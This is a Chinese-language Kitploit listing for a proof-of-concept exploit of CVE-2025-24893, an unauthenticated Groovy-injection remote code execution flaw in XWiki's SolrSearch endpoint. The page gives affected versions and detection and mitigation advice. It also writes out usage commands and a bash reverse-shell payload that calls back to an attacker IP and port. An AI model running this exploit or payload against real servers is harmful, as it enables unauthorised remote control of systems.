Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-24893-poc — 针对CVE-2025-24893的概念验证漏洞利用工具,该漏洞是XWiki中一个未经认证的远程代码执行(RCE)漏洞。通过Groovy脚本执行,利用SolrSearch端点中的模板注入缺陷。 | Kitploit
工具/GitHubGitHub/investigato/cve-2025-24893-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

针对CVE-2025-24893的概念验证漏洞利用工具,该漏洞是XWiki中一个未经认证的远程代码执行(RCE)漏洞。通过Groovy脚本执行,利用SolrSearch端点中的模板注入缺陷。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24893 — XWiki 未授权远程代码执行(PoC)

针对 CVE-2025-24893 的概念验证漏洞利用程序,该漏洞是 XWiki 中的一个严重未授权 远程代码执行 漏洞。
此漏洞利用程序滥用了 SolrSearch 端点中的 Groovy 模板注入,无需认证即可执行任意命令(包括反弹 Shell)。

💥 漏洞详情

XWiki 处理发送给 SolrSearch RSS 端点的精心构造的输入时存在一个缺陷,允许攻击者将 Groovy 代码注入到渲染管道中。
这使得攻击者可以通过 {{groovy}} 脚本块实现 未授权远程代码执行。

✅ 受影响版本

  • < 15.10.11
  • >= 16.0.0 and < 16.4.1

❌ 修复版本

  • 15.10.11
  • 16.4.1

🔧 使用方法

下载发布版本:

发布版本

或从源码构建:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

反弹 Shell 载荷

有一个预构建的反弹 Shell 载荷,格式如下:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ 法律免责声明

此代码仅用于教育和授权的安全研究。
请勿将此漏洞利用程序用于您未拥有或未经明确许可测试的系统。


✍️ 致谢

  • 漏洞利用 PoC 由 Artemir7 提供
  • Rust 端口由 investigato 提供

🛡️ 检测与缓解措施

  • 升级到 XWiki 15.10.11 或 16.4.1+
  • 监控对 /bin/get/Main/SolrSearch?media=rss 的可疑访问
  • 如果可能,禁用匿名用户的 Groovy 执行
下载工具